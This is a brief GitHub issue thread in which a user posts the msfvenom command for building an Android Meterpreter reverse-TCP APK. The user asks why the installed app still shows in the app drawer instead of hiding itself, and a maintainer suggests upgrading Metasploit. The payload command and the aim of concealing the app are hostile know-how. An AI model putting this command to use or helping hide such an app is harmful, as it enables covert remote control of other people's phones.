### ISSUE TITLE
problem with the msfvenom

### ISSUE THREAD

**Issue by ghost** [ParrotSec/changelog#2]
i have a problem with the android/meterpreter/reverse_tcp payload, when i make the apk file with the command "msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=443 R > xxxx", when i install it on my android to try it out, the app still appearing on the app drawer, instead of kali linux when i write the exact following command and install the app on my phone, it vanish by itself. What should i do?

**Comment by PalinuroSec** [comment]
upgrade your system to get the latest version of metasploit and msfvenom
